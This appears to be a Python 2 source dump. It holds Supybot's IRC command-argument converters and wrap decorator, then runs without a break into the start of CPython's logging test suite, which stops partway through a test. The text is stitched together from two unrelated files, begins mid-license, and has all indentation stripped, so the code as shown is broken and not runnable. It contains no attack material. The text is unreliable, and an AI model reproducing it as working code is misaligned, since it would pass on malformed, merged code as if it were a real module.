# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
"""
Includes wrappers for commands.
"""
import time
import types
import getopt
import inspect
import threading
import supybot.log as log
import supybot.conf as conf
import supybot.utils as utils
import supybot.world as world
import supybot.ircdb as ircdb
import supybot.ircmsgs as ircmsgs
import supybot.ircutils as ircutils
import supybot.callbacks as callbacks
###
# Non-arg wrappers -- these just change the behavior of a command without
# changing the arguments given to it.
###
# Thread has to be a non-arg wrapper because by the time we're parsing and
# validating arguments, we're inside the function we'd want to thread.
def thread(f):
"""Makes sure a command spawns a thread when called."""
def newf(self, irc, msg, args, *L, **kwargs):
if world.isMainThread():
targetArgs = (self.callingCommand, irc, msg, args) + tuple(L)
t = callbacks.CommandThread(target=self._callCommand,
args=targetArgs, kwargs=kwargs)
t.start()
else:
f(self, irc, msg, args, *L, **kwargs)
return utils.python.changeFunctionName(newf, f.func_name, f.__doc__)
class UrlSnarfThread(world.SupyThread):
def __init__(self, *args, **kwargs):
assert 'url' in kwargs
kwargs['name'] = 'Thread #%s (for snarfing %s)' % \
(world.threadsSpawned, kwargs.pop('url'))
super(UrlSnarfThread, self).__init__(*args, **kwargs)
self.setDaemon(True)
def run(self):
try:
super(UrlSnarfThread, self).run()
except utils.web.Error, e:
log.debug('Exception in urlSnarfer: %s', utils.exnToString(e))
class SnarfQueue(ircutils.FloodQueue):
timeout = conf.supybot.snarfThrottle
def key(self, channel):
return channel
_snarfed = SnarfQueue()
class SnarfIrc(object):
def __init__(self, irc, channel, url):
self.irc = irc
self.url = url
self.channel = channel
def __getattr__(self, attr):
return getattr(self.irc, attr)
def reply(self, *args, **kwargs):
_snarfed.enqueue(self.channel, self.url)
return self.irc.reply(*args, **kwargs)
# This lock is used to serialize the calls to snarfers, so
# earlier snarfers are guaranteed to beat out later snarfers.
_snarfLock = threading.Lock()
def urlSnarfer(f):
"""Protects the snarfer from loops (with other bots) and whatnot."""
def newf(self, irc, msg, match, *L, **kwargs):
url = match.group(0)
channel = msg.args[0]
if not irc.isChannel(channel) or (ircmsgs.isCtcp(msg) and not
ircmsgs.isAction(msg)):
return
if ircdb.channels.getChannel(channel).lobotomized:
self.log.debug('Not snarfing in %s: lobotomized.', channel)
return
if _snarfed.has(channel, url):
self.log.info('Throttling snarf of %s in %s.', url, channel)
return
irc = SnarfIrc(irc, channel, url)
def doSnarf():
_snarfLock.acquire()
try:
# This has to be *after* we've acquired the lock so we can be
# sure that all previous urlSnarfers have already run to
# completion.
if msg.repliedTo:
self.log.debug('Not snarfing, msg is already repliedTo.')
return
f(self, irc, msg, match, *L, **kwargs)
finally:
_snarfLock.release()
if threading.currentThread() is not world.mainThread:
doSnarf()
else:
L = list(L)
t = UrlSnarfThread(target=doSnarf, url=url)
t.start()
newf = utils.python.changeFunctionName(newf, f.func_name, f.__doc__)
return newf
###
# Converters, which take irc, msg, args, and a state object, and build up the
# validated and converted args for the method in state.args.
###
# This is just so we can centralize this, since it may change.
def _int(s):
base = 10
if s.startswith('0x'):
base = 16
s = s[2:]
elif s.startswith('0b'):
base = 2
s = s[2:]
elif s.startswith('0') and len(s) > 1:
base = 8
s = s[1:]
try:
return int(s, base)
except ValueError:
if base == 10:
return int(float(s))
else:
raise
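# Examples of the prefix handling in _int (standard int()/float() semantics):
#   _int('0x10')  == 16   # hexadecimal
#   _int('0b101') == 5    # binary
#   _int('010')   == 8    # leading zero -> octal
#   _int('3.7')   == 3    # base-10 fallback through int(float(s))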
def getInt(irc, msg, args, state, type='integer', p=None):
try:
i = _int(args[0])
if p is not None:
if not p(i):
state.errorInvalid(type, args[0])
state.args.append(i)
del args[0]
except ValueError:
state.errorInvalid(type, args[0])
def getNonInt(irc, msg, args, state, type='non-integer value'):
try:
        _int(args[0])  # succeeds only if args[0] is an integer, which is invalid here
state.errorInvalid(type, args[0])
except ValueError:
state.args.append(args.pop(0))
def getLong(irc, msg, args, state, type='long'):
getInt(irc, msg, args, state, type)
state.args[-1] = long(state.args[-1])
def getFloat(irc, msg, args, state, type='floating point number'):
try:
state.args.append(float(args[0]))
del args[0]
except ValueError:
state.errorInvalid(type, args[0])
def getPositiveInt(irc, msg, args, state, *L):
getInt(irc, msg, args, state,
p=lambda i: i>0, type='positive integer', *L)
def getNonNegativeInt(irc, msg, args, state, *L):
getInt(irc, msg, args, state,
p=lambda i: i>=0, type='non-negative integer', *L)
def getIndex(irc, msg, args, state):
getInt(irc, msg, args, state, type='index')
if state.args[-1] > 0:
state.args[-1] -= 1
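# getIndex converts user-facing 1-based indices to Python's 0-based ones:
# an argument of '1' appends 0 to state.args and '2' appends 1, while zero
# and negative values (e.g. '-1' for "last") are passed through unchanged.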
def getId(irc, msg, args, state, kind=None):
type = 'id'
if kind is not None and not kind.endswith('id'):
type = kind + ' id'
original = args[0]
try:
args[0] = args[0].lstrip('#')
getInt(irc, msg, args, state, type=type)
except Exception, e:
args[0] = original
raise
def getExpiry(irc, msg, args, state):
now = int(time.time())
try:
expires = _int(args[0])
if expires:
expires += now
state.args.append(expires)
del args[0]
except ValueError:
state.errorInvalid('number of seconds', args[0])
def getBoolean(irc, msg, args, state):
try:
state.args.append(utils.str.toBool(args[0]))
del args[0]
except ValueError:
state.errorInvalid('boolean', args[0])
def getNetworkIrc(irc, msg, args, state, errorIfNoMatch=False):
if args:
for otherIrc in world.ircs:
if otherIrc.network.lower() == args[0].lower():
state.args.append(otherIrc)
del args[0]
return
if errorIfNoMatch:
raise callbacks.ArgumentError
else:
state.args.append(irc)
def getHaveOp(irc, msg, args, state, action='do that'):
if not state.channel:
getChannel(irc, msg, args, state)
if state.channel not in irc.state.channels:
state.error('I\'m not even in %s.' % state.channel, Raise=True)
if not irc.state.channels[state.channel].isOp(irc.nick):
state.error('I need to be opped to %s.' % action, Raise=True)
def validChannel(irc, msg, args, state):
if irc.isChannel(args[0]):
state.args.append(args.pop(0))
else:
state.errorInvalid('channel', args[0])
def getHostmask(irc, msg, args, state):
if ircutils.isUserHostmask(args[0]):
state.args.append(args.pop(0))
else:
try:
hostmask = irc.state.nickToHostmask(args[0])
state.args.append(hostmask)
del args[0]
except KeyError:
state.errorInvalid('nick or hostmask', args[0])
def getBanmask(irc, msg, args, state):
getHostmask(irc, msg, args, state)
if not state.channel:
getChannel(irc, msg, args, state)
channel = state.channel
banmaskstyle = conf.supybot.protocols.irc.banmask
state.args[-1] = banmaskstyle.makeBanmask(state.args[-1])
def getUser(irc, msg, args, state):
try:
state.args.append(ircdb.users.getUser(msg.prefix))
except KeyError:
state.errorNotRegistered(Raise=True)
def getOtherUser(irc, msg, args, state):
# Although ircdb.users.getUser could accept a hostmask, we're explicitly
# excluding that from our interface with this check
if ircutils.isUserHostmask(args[0]):
state.errorNoUser(args[0])
try:
state.args.append(ircdb.users.getUser(args[0]))
del args[0]
except KeyError:
try:
getHostmask(irc, msg, [args[0]], state)
hostmask = state.args.pop()
state.args.append(ircdb.users.getUser(hostmask))
del args[0]
except (KeyError, callbacks.Error):
state.errorNoUser(name=args[0])
def _getRe(f):
def get(irc, msg, args, state, convert=True):
original = args[:]
s = args.pop(0)
def isRe(s):
try:
_ = f(s)
return True
except ValueError:
return False
try:
while len(s) < 512 and not isRe(s):
s += ' ' + args.pop(0)
if len(s) < 512:
if convert:
state.args.append(f(s))
else:
state.args.append(s)
else:
state.errorInvalid('regular expression', s)
except IndexError:
args[:] = original
state.errorInvalid('regular expression', s)
return get
getMatcher = _getRe(utils.str.perlReToPythonRe)
getReplacer = _getRe(utils.str.perlReToReplacer)
def getNick(irc, msg, args, state):
if ircutils.isNick(args[0]):
if 'nicklen' in irc.state.supported:
if len(args[0]) > irc.state.supported['nicklen']:
state.errorInvalid('nick', args[0],
'That nick is too long for this server.')
state.args.append(args.pop(0))
else:
state.errorInvalid('nick', args[0])
def getSeenNick(irc, msg, args, state, errmsg=None):
try:
_ = irc.state.nickToHostmask(args[0])
state.args.append(args.pop(0))
except KeyError:
if errmsg is None:
errmsg = 'I haven\'t seen %s.' % args[0]
state.error(errmsg, Raise=True)
def getChannel(irc, msg, args, state):
if args and irc.isChannel(args[0]):
channel = args.pop(0)
elif irc.isChannel(msg.args[0]):
channel = msg.args[0]
else:
state.log.debug('Raising ArgumentError because there is no channel.')
raise callbacks.ArgumentError
state.channel = channel
state.args.append(channel)
def getChannelDb(irc, msg, args, state, **kwargs):
channelSpecific = conf.supybot.databases.plugins.channelSpecific
try:
getChannel(irc, msg, args, state, **kwargs)
channel = channelSpecific.getChannelLink(state.channel)
state.channel = channel
state.args[-1] = channel
except (callbacks.ArgumentError, IndexError):
if channelSpecific():
raise
channel = channelSpecific.link()
if not conf.get(channelSpecific.link.allow, channel):
log.warning('channelSpecific.link is globally set to %s, but '
'%s disallowed linking to its db.', channel, channel)
raise
else:
channel = channelSpecific.getChannelLink(channel)
state.channel = channel
state.args.append(channel)
def inChannel(irc, msg, args, state):
if not state.channel:
getChannel(irc, msg, args, state)
if state.channel not in irc.state.channels:
state.error('I\'m not in %s.' % state.channel, Raise=True)
def onlyInChannel(irc, msg, args, state):
if not (irc.isChannel(msg.args[0]) and msg.args[0] in irc.state.channels):
state.error('This command may only be given in a channel that I am in.',
Raise=True)
else:
state.channel = msg.args[0]
state.args.append(state.channel)
def callerInGivenChannel(irc, msg, args, state):
channel = args[0]
if irc.isChannel(channel):
if channel in irc.state.channels:
if msg.nick in irc.state.channels[channel].users:
state.args.append(args.pop(0))
else:
state.error('You must be in %s.' % channel, Raise=True)
else:
state.error('I\'m not in %s.' % channel, Raise=True)
else:
state.errorInvalid('channel', args[0])
def nickInChannel(irc, msg, args, state):
originalArgs = state.args[:]
inChannel(irc, msg, args, state)
state.args = originalArgs
if args[0] not in irc.state.channels[state.channel].users:
state.error('%s is not in %s.' % (args[0], state.channel), Raise=True)
state.args.append(args.pop(0))
def getChannelOrNone(irc, msg, args, state):
try:
getChannel(irc, msg, args, state)
except callbacks.ArgumentError:
state.args.append(None)
def checkChannelCapability(irc, msg, args, state, cap):
if not state.channel:
getChannel(irc, msg, args, state)
cap = ircdb.canonicalCapability(cap)
cap = ircdb.makeChannelCapability(state.channel, cap)
if not ircdb.checkCapability(msg.prefix, cap):
state.errorNoCapability(cap, Raise=True)
def getOp(irc, msg, args, state):
checkChannelCapability(irc, msg, args, state, 'op')
def getHalfop(irc, msg, args, state):
checkChannelCapability(irc, msg, args, state, 'halfop')
def getVoice(irc, msg, args, state):
checkChannelCapability(irc, msg, args, state, 'voice')
def getLowered(irc, msg, args, state):
state.args.append(ircutils.toLower(args.pop(0)))
def getSomething(irc, msg, args, state, errorMsg=None, p=None):
if p is None:
p = lambda _: True
if not args[0] or not p(args[0]):
if errorMsg is None:
errorMsg = 'You must not give the empty string as an argument.'
state.error(errorMsg, Raise=True)
else:
state.args.append(args.pop(0))
def getSomethingNoSpaces(irc, msg, args, state, *L):
def p(s):
return len(s.split(None, 1)) == 1
getSomething(irc, msg, args, state, p=p, *L)
def private(irc, msg, args, state):
if irc.isChannel(msg.args[0]):
state.errorRequiresPrivacy(Raise=True)
def public(irc, msg, args, state, errmsg=None):
if not irc.isChannel(msg.args[0]):
if errmsg is None:
errmsg = 'This message must be sent in a channel.'
state.error(errmsg, Raise=True)
def checkCapability(irc, msg, args, state, cap):
cap = ircdb.canonicalCapability(cap)
if not ircdb.checkCapability(msg.prefix, cap):
state.errorNoCapability(cap, Raise=True)
def owner(irc, msg, args, state):
checkCapability(irc, msg, args, state, 'owner')
def admin(irc, msg, args, state):
checkCapability(irc, msg, args, state, 'admin')
def anything(irc, msg, args, state):
state.args.append(args.pop(0))
def getGlob(irc, msg, args, state):
glob = args.pop(0)
if '*' not in glob and '?' not in glob:
glob = '*%s*' % glob
state.args.append(glob)
def getUrl(irc, msg, args, state):
if utils.web.urlRe.match(args[0]):
state.args.append(args.pop(0))
else:
state.errorInvalid('url', args[0])
def getEmail(irc, msg, args, state):
if utils.net.emailRe.match(args[0]):
state.args.append(args.pop(0))
else:
state.errorInvalid('email', args[0])
def getHttpUrl(irc, msg, args, state):
if utils.web.httpUrlRe.match(args[0]):
state.args.append(args.pop(0))
elif utils.web.httpUrlRe.match('http://' + args[0]):
state.args.append('http://' + args.pop(0))
else:
state.errorInvalid('http url', args[0])
def getNow(irc, msg, args, state):
state.args.append(int(time.time()))
def getCommandName(irc, msg, args, state):
if ' ' in args[0]:
state.errorInvalid('command name', args[0])
else:
state.args.append(callbacks.canonicalName(args.pop(0)))
def getIp(irc, msg, args, state):
if utils.net.isIP(args[0]):
state.args.append(args.pop(0))
else:
state.errorInvalid('ip', args[0])
def getLetter(irc, msg, args, state):
if len(args[0]) == 1:
state.args.append(args.pop(0))
else:
state.errorInvalid('letter', args[0])
def getMatch(irc, msg, args, state, regexp, errmsg):
m = regexp.search(args[0])
if m is not None:
state.args.append(m)
del args[0]
else:
state.error(errmsg, Raise=True)
def getLiteral(irc, msg, args, state, literals, errmsg=None):
# ??? Should we allow abbreviations?
if isinstance(literals, basestring):
literals = (literals,)
abbrevs = utils.abbrev(literals)
if args[0] in abbrevs:
state.args.append(abbrevs[args.pop(0)])
elif errmsg is not None:
state.error(errmsg, Raise=True)
else:
raise callbacks.ArgumentError
def getTo(irc, msg, args, state):
if args[0].lower() == 'to':
args.pop(0)
def getPlugin(irc, msg, args, state, require=True):
cb = irc.getCallback(args[0])
if cb is not None:
state.args.append(cb)
del args[0]
elif require:
state.errorInvalid('plugin', args[0])
else:
state.args.append(None)
def getIrcColor(irc, msg, args, state):
if args[0] in ircutils.mircColors:
state.args.append(ircutils.mircColors[args.pop(0)])
else:
state.errorInvalid('irc color')
def getText(irc, msg, args, state):
if args:
state.args.append(' '.join(args))
args[:] = []
else:
raise IndexError
wrappers = ircutils.IrcDict({
'admin': admin,
'anything': anything,
'banmask': getBanmask,
'boolean': getBoolean,
'callerInGivenChannel': callerInGivenChannel,
'capability': getSomethingNoSpaces,
'channel': getChannel,
'channelDb': getChannelDb,
'checkCapability': checkCapability,
'checkChannelCapability': checkChannelCapability,
'color': getIrcColor,
'commandName': getCommandName,
'email': getEmail,
'expiry': getExpiry,
'filename': getSomething, # XXX Check for validity.
'float': getFloat,
'glob': getGlob,
'halfop': getHalfop,
'haveOp': getHaveOp,
'hostmask': getHostmask,
'httpUrl': getHttpUrl,
'id': getId,
'inChannel': inChannel,
'index': getIndex,
'int': getInt,
'ip': getIp,
'letter': getLetter,
'literal': getLiteral,
'long': getLong,
'lowered': getLowered,
'matches': getMatch,
'networkIrc': getNetworkIrc,
'nick': getNick,
'nickInChannel': nickInChannel,
'nonInt': getNonInt,
'nonNegativeInt': getNonNegativeInt,
'now': getNow,
'onlyInChannel': onlyInChannel,
'op': getOp,
'otherUser': getOtherUser,
'owner': owner,
'plugin': getPlugin,
'positiveInt': getPositiveInt,
'private': private,
'public': public,
'regexpMatcher': getMatcher,
'regexpReplacer': getReplacer,
'seenNick': getSeenNick,
'something': getSomething,
'somethingWithoutSpaces': getSomethingNoSpaces,
'text': getText,
'to': getTo,
'url': getUrl,
'user': getUser,
'validChannel': validChannel,
'voice': getVoice,
})
def addConverter(name, wrapper):
wrappers[name] = wrapper
class UnknownConverter(KeyError):
pass
def getConverter(name):
try:
return wrappers[name]
except KeyError, e:
raise UnknownConverter, str(e)
def callConverter(name, irc, msg, args, state, *L):
getConverter(name)(irc, msg, args, state, *L)
###
# Contexts. These determine what the nature of conversions is; whether they're
# defaulted, or many of them are allowed, etc. Contexts should be reusable;
# i.e., they should not maintain state between calls.
###
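# A spec may be a converter name ('int'), a tuple of a converter name plus
# extra converter arguments (('literal', ('on', 'off'))), None (treated as
# 'anything'), or an already-constructed context instance.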
def contextify(spec):
if not isinstance(spec, context):
spec = context(spec)
return spec
def setDefault(state, default):
if callable(default):
state.args.append(default())
else:
state.args.append(default)
class context(object):
def __init__(self, spec):
self.args = ()
self.spec = spec # for repr
if isinstance(spec, tuple):
assert spec, 'tuple spec must not be empty.'
self.args = spec[1:]
self.converter = getConverter(spec[0])
elif spec is None:
self.converter = getConverter('anything')
elif isinstance(spec, basestring):
self.args = ()
self.converter = getConverter(spec)
else:
assert isinstance(spec, context)
self.converter = spec
def __call__(self, irc, msg, args, state):
log.debug('args before %r: %r', self, args)
self.converter(irc, msg, args, state, *self.args)
log.debug('args after %r: %r', self, args)
def __repr__(self):
return '<%s for %s>' % (self.__class__.__name__, self.spec)
class rest(context):
def __call__(self, irc, msg, args, state):
if args:
original = args[:]
args[:] = [' '.join(args)]
try:
super(rest, self).__call__(irc, msg, args, state)
except Exception, e:
args[:] = original
else:
raise IndexError
# additional means: Look for this (and make sure it's of this type). If
# there are no arguments for us to check, then use our default.
class additional(context):
def __init__(self, spec, default=None):
self.__parent = super(additional, self)
self.__parent.__init__(spec)
self.default = default
def __call__(self, irc, msg, args, state):
try:
self.__parent.__call__(irc, msg, args, state)
except IndexError:
log.debug('Got IndexError, returning default.')
setDefault(state, self.default)
# optional means: Look for this, but if it's not the type I'm expecting or
# there are no arguments for us to check, then use the default value.
class optional(additional):
def __call__(self, irc, msg, args, state):
try:
super(optional, self).__call__(irc, msg, args, state)
except (callbacks.ArgumentError, callbacks.Error), e:
log.debug('Got %s, returning default.', utils.exnToString(e))
state.errored = False
setDefault(state, self.default)
class any(context):
def __init__(self, spec, continueOnError=False):
self.__parent = super(any, self)
self.__parent.__init__(spec)
self.continueOnError = continueOnError
def __call__(self, irc, msg, args, state):
st = state.essence()
try:
while args:
self.__parent.__call__(irc, msg, args, st)
except IndexError:
pass
except (callbacks.ArgumentError, callbacks.Error), e:
if not self.continueOnError:
raise
else:
log.debug('Got %s, returning default.', utils.exnToString(e))
pass
state.args.append(st.args)
class many(any):
def __call__(self, irc, msg, args, state):
super(many, self).__call__(irc, msg, args, state)
if not state.args[-1]:
state.args.pop()
raise callbacks.ArgumentError
class first(context):
def __init__(self, *specs, **kw):
if 'default' in kw:
self.default = kw.pop('default')
assert not kw, 'Bad kwargs for first.__init__'
self.spec = specs # for __repr__
self.specs = map(contextify, specs)
def __call__(self, irc, msg, args, state):
errored = False
for spec in self.specs:
try:
spec(irc, msg, args, state)
return
except Exception, e:
errored = state.errored
state.errored = False
continue
if hasattr(self, 'default'):
state.args.append(self.default)
else:
state.errored = errored
raise e
class reverse(context):
def __call__(self, irc, msg, args, state):
args[:] = args[::-1]
super(reverse, self).__call__(irc, msg, args, state)
args[:] = args[::-1]
class commalist(context):
def __call__(self, irc, msg, args, state):
original = args[:]
st = state.essence()
trailingComma = True
try:
while trailingComma:
arg = args.pop(0)
if not arg.endswith(','):
trailingComma = False
for part in arg.split(','):
if part: # trailing commas
super(commalist, self).__call__(irc, msg, [part], st)
state.args.append(st.args)
except Exception, e:
args[:] = original
raise
class getopts(context):
"""The empty string indicates that no argument is taken; None indicates
that there is no converter for the argument."""
def __init__(self, getopts):
self.spec = getopts # for repr
self.getopts = {}
self.getoptL = []
for (name, spec) in getopts.iteritems():
if spec == '':
self.getoptL.append(name)
self.getopts[name] = None
else:
self.getoptL.append(name + '=')
self.getopts[name] = contextify(spec)
log.debug('getopts: %r', self.getopts)
log.debug('getoptL: %r', self.getoptL)
def __call__(self, irc, msg, args, state):
log.debug('args before %r: %r', self, args)
(optlist, rest) = getopt.getopt(args, '', self.getoptL)
getopts = []
for (opt, arg) in optlist:
opt = opt[2:] # Strip --
log.debug('opt: %r, arg: %r', opt, arg)
context = self.getopts[opt]
if context is not None:
st = state.essence()
context(irc, msg, [arg], st)
assert len(st.args) == 1
getopts.append((opt, st.args[0]))
else:
getopts.append((opt, True))
state.args.append(getopts)
args[:] = rest
log.debug('args after %r: %r', self, args)
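# An illustrative spec (editor's example): getopts({'timeout': 'int',
# 'verbose': ''}) accepts --timeout=<n>, converted via the 'int' converter,
# and a bare --verbose flag; the list of (option, value) pairs is appended to
# state.args and the non-option arguments are left in args.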
###
# This is our state object, passed to converters along with irc, msg, and args.
###
class State(object):
log = log
def __init__(self, types):
self.args = []
self.kwargs = {}
self.types = types
self.channel = None
self.errored = False
def __getattr__(self, attr):
if attr.startswith('error'):
self.errored = True
return getattr(dynamic.irc, attr)
else:
raise AttributeError, attr
def essence(self):
st = State(self.types)
for (attr, value) in self.__dict__.iteritems():
if attr not in ('args', 'kwargs'):
setattr(st, attr, value)
return st
def __repr__(self):
return '%s(args=%r, kwargs=%r, channel=%r)' % (self.__class__.__name__,
self.args, self.kwargs,
self.channel)
###
# This is a compiled Spec object.
###
class Spec(object):
def _state(self, types, attrs={}):
st = State(types)
st.__dict__.update(attrs)
st.allowExtra = self.allowExtra
return st
def __init__(self, types, allowExtra=False):
self.types = types
self.allowExtra = allowExtra
utils.seq.mapinto(contextify, self.types)
def __call__(self, irc, msg, args, stateAttrs={}):
state = self._state(self.types[:], stateAttrs)
while state.types:
context = state.types.pop(0)
try:
context(irc, msg, args, state)
except IndexError:
raise callbacks.ArgumentError
if args and not state.allowExtra:
log.debug('args and not self.allowExtra: %r', args)
raise callbacks.ArgumentError
return state
def wrap(f, specList=[], name=None, **kw):
name = name or f.func_name
spec = Spec(specList, **kw)
def newf(self, irc, msg, args, **kwargs):
state = spec(irc, msg, args, stateAttrs={'cb': self, 'log': self.log})
self.log.debug('State before call: %s', state)
if state.errored:
self.log.debug('Refusing to call %s due to state.errored.', f)
else:
try:
f(self, irc, msg, args, *state.args, **state.kwargs)
except TypeError:
self.log.error('Spec: %s', specList)
self.log.error('Received args: %s', args)
code = f.func_code
funcArgs = inspect.getargs(code)[0][len(self.commandArgs):]
self.log.error('Extra args: %s', funcArgs)
raise
return utils.python.changeFunctionName(newf, name, f.__doc__)
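# Illustrative use of wrap (an editor's sketch; the command name and body are
# hypothetical):
#
#     def repeat(self, irc, msg, args, channel, count):
#         """[<channel>] [<count>]"""
#         irc.reply(' '.join([msg.nick] * count))
#     repeat = wrap(repeat, ['channel', optional('positiveInt', 1)])
#
# Each element of the spec list is contextified and consumes arguments via its
# converter; the validated results in state.args are then passed positionally
# after (self, irc, msg, args).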
__all__ = [
# Contexts.
'any', 'many',
'optional', 'additional',
'rest', 'getopts',
'first', 'reverse',
'commalist',
# Converter helpers.
'getConverter', 'addConverter', 'callConverter',
# Decorators.
'urlSnarfer', 'thread',
# Functions.
'wrap',
# Stuff for testing.
'Spec',
]
# This doesn't work. Suck.
## if world.testing:
## __all__.append('Spec')
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
test_logging.py
#!/usr/bin/env python
#
# Copyright 2001-2012 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2012 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import cPickle
import cStringIO
import gc
import json
import os
import random
import re
import select
import socket
from SocketServer import ThreadingTCPServer, StreamRequestHandler
import struct
import sys
import tempfile
from test.test_support import captured_stdout, run_with_locale, run_unittest
import textwrap
import time
import unittest
import warnings
import weakref
try:
import threading
except ImportError:
threading = None
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = logger_dict.copy()
self.saved_level_names = logging._levelNames.copy()
finally:
logging._releaseLock()
# Set two unused loggers: one non-ASCII and one Unicode.
# This is to test correct operation when sorting existing
# loggers in the configuration code. See issue 8201.
logging.getLogger("\xab\xd7\xbb")
logging.getLogger(u"\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = cStringIO.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
self.root_logger.addHandler(self.root_hdlr)
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelNames.clear()
logging._levelNames.update(self.saved_level_names)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(self.expected_log_pat)
try:
stream.reset()
actual_lines = stream.readlines()
except AttributeError:
# StringIO.StringIO lacks a reset() method.
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warn(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
        DEB.warn(m())
        DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warn(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warn(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warn(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warn(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
